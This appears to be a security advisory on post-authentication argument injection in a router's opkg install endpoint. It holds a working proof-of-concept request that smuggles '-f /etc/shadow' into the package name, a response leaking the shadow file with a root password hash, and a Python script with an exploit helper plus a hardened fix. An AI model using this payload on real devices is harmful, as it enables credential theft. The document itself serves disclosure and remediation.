Arbitrary File Read
The software installation endpoint (/cgi-bin/api/software/install) passes the user-supplied package name into the command line of opkg, which runs as root, without sanitising it. Because opkg accepts -f <file> to select an alternative configuration file, an attacker who injects that option through the name parameter (name=a -f /etc/shadow in the request below) makes opkg open any file on the device. opkg then echoes each line it cannot parse as configuration back in its "Ignoring invalid line" diagnostics, and the endpoint returns that stderr verbatim in its JSON response, so the file contents are disclosed to the caller. Two caveats for anyone reproducing this: the request must carry a valid Admin-Token, so the issue is post-authentication, and only lines that are not valid opkg configuration syntax are echoed (blank lines and lines starting with # are silently skipped), which is why /etc/shadow and /etc/passwd leak in full but a file that happens to contain opkg directives would not.
Proof of Concept:
Request
POST /cgi-bin/api/software/install HTTP/1.1
Host: 192.168.8.1
Content-Length: 25
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: ce0fc001ff684088a83257360de4bb44
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.8.1
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=ce0fc001ff684088a83257360de4bb44
Connection: close
name=a%20-f%20/etc/shadow
Response
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 804
Connection: close
Date: Sun, 19 Mar 2023 08:25:52 GMT
Server: lighttpd/1.4.48
{"code":-13,"stderr":"Collected errors:\n * opkg_conf_parse_file: \/etc\/shadow:1: Ignoring invalid line: `root:$1$lchqx22V$LOxNwv3ggvnFw\/kIyD2eB0:19256:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:2: Ignoring invalid line: `daemon:*:0:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:3: Ignoring invalid line: `ftp:*:0:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:4: Ignoring invalid line: `network:*:0:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:5: Ignoring invalid line: `nobody:*:0:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:6: Ignoring invalid line: `dnsmasq:x:0:0:99999:7:::'\n * opkg_conf_parse_file: \/etc\/shadow:7: Ignoring invalid line: `stubby:x:0:0:99999:7:::'\n * opkg_install_cmd: Cannot install package a.\n","stdout":"Unknown package 'a'.\n"}
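The script below is an added example, not part of the original advisory or the vendor's code. It builds the injected form body shown in the request above, pulls the leaked file lines back out of the "Ignoring invalid line" diagnostics in a response of the shape shown, and, for contrast, shows the input validation a fixed handler would apply before handing a name to opkg. The sample response is a constructed copy of the real one with a placeholder hash; the package-name allowlist, the send_exploit helper and its header set are assumptions for illustration, not the vendor's implementation.

```python
import json
import re
from urllib.parse import quote, urlencode

# opkg_conf_parse_file emits one of these per line it cannot parse as config;
# the backtick/quote-wrapped tail is the raw line of the target file.
LEAK_RE = re.compile(
    r"opkg_conf_parse_file: (?P<path>[^:]+):(?P<lineno>\d+): "
    r"Ignoring invalid line: `(?P<line>.*)'$"
)

# Constructed sample in the same shape as the device's JSON reply.
# The root hash is a placeholder, not a real credential.
SAMPLE_RESPONSE = json.dumps({
    "code": -13,
    "stderr": (
        "Collected errors:\n"
        " * opkg_conf_parse_file: /etc/shadow:1: Ignoring invalid line: "
        "`root:$1$saltsalt$placeholderhashvalue:19256:0:99999:7:::'\n"
        " * opkg_conf_parse_file: /etc/shadow:2: Ignoring invalid line: "
        "`daemon:*:0:0:99999:7:::'\n"
        " * opkg_conf_parse_file: /etc/shadow:3: Ignoring invalid line: "
        "`nobody:*:0:0:99999:7:::'\n"
        " * opkg_install_cmd: Cannot install package a.\n"
    ),
    "stdout": "Unknown package 'a'.\n",
})


def build_install_body(target_path: str) -> str:
    """Form body that smuggles opkg's -f option in through the package name.

    Uses %20 for spaces (quote, not quote_plus) to match the advisory's request.
    """
    return urlencode({"name": f"a -f {target_path}"}, safe="/", quote_via=quote)


def extract_leaked_lines(response_text: str, target_path: str) -> list:
    """Recover the target file's lines, in order, from the JSON stderr field.

    Only lines opkg rejected as config appear here; blank and '#' lines are lost.
    """
    body = json.loads(response_text)
    leaked = {}
    for raw in body.get("stderr", "").splitlines():
        m = LEAK_RE.search(raw)
        if m and m.group("path") == target_path:
            leaked[int(m.group("lineno"))] = m.group("line")
    return [leaked[n] for n in sorted(leaked)]


def send_exploit(host: str, token: str, target_path: str) -> list:
    """Issue the request against a live device (assumed header set; not run by tests)."""
    import http.client
    conn = http.client.HTTPConnection(host, timeout=10)
    conn.request("POST", "/cgi-bin/api/software/install",
                 body=build_install_body(target_path),
                 headers={
                     "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                     "Authorization": token,
                     "Cookie": f"Admin-Token={token}",
                     "X-Requested-With": "XMLHttpRequest",
                 })
    return extract_leaked_lines(conn.getresponse().read().decode(), target_path)


# --- the check a fixed handler should apply (assumed allowlist) ---------------
# Debian/opkg-style package names: lowercase alphanumerics plus . + _ -,
# starting with an alphanumeric, so no whitespace and no leading '-'.
PKG_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9.+_-]{0,127}$")


def is_safe_package_name(name: str) -> bool:
    return PKG_NAME_RE.fullmatch(name) is not None


def build_opkg_argv(name: str) -> list:
    """Argv for a hardened handler: validated name, list form (no shell),
    and '--' so getopt_long stops option parsing before the user value."""
    if not is_safe_package_name(name):
        raise ValueError(f"rejected package name: {name!r}")
    return ["opkg", "install", "--", name]


if __name__ == "__main__":
    print(build_install_body("/etc/shadow"))
    for line in extract_leaked_lines(SAMPLE_RESPONSE, "/etc/shadow"):
        print(line)
```

The allowlist is the control that matters: it rejects the space and the leading dash that turn a package name into an extra argument. Passing argv as a list and adding -- are belt and braces on top of it, and the -- separator relies on opkg parsing its options with getopt_long, which is the case for the opkg command-line front end.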